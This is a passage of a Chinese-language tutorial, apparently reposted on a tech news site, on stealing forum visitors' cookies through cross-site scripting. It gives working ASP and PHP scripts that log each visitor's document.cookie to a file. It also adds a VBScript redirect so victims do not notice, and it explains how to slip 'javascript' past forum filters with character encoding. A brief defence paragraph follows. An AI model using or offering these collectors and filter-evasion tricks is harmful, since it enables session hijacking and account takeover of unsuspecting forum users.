扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
msg后边跟的参数,而参数我们指定的是document.cookie,也就是访问此贴用户的cookie。
cookies.asp的代码是:
<%
testfile=Server.MapPath("hun.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
这样所有访问者的cookie都会收集在hun.txt这个文件里
但是访问者访问我们的帖子,同样会访问到我们的网站的,这样不是露馅了吗?呵呵,但只要我们稍做处理
就可以做的相对真实,比如我们加上下面的代码
<script language=vbscript>
window.location.href="http://xxx.xxx.xxx"
</script>
这个xxx.xxx.xxx最好换成你攻击的网站的域名,这样做的目的是在他访问我们精心构造的网站同时开打他
自己的网站,呵呵,这样是不是会更隐蔽一点呢?
这个cookies.asp和有一个同样作用的cookies.php一样,附代码如下:
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("cookies.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}
?>
但是大部份做的不错的论坛,都过滤了javascript这些字符。不过还是有方法可以利用的,
可以在论坛发的贴里将javascript写成ascii码。像j可以写成”j”
防范的方法,就是过滤字符像javascript/<script>/’/;/&/#了等等,
当然前提是你的网页还要正常显示。建议大家不要轻易打开一些不明url,要将自己的信箱、论坛、QQ等资料的密码设的都不一样,
如果一旦资料或密码被盗,避免引连锁反应,所有资料和密码都被别人获得。这就要用到博大精深是社会工程学了。
总结一下吧。跨站的技巧性很强,呵呵大家多积累经验用起来会达到事半功倍的效果。
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者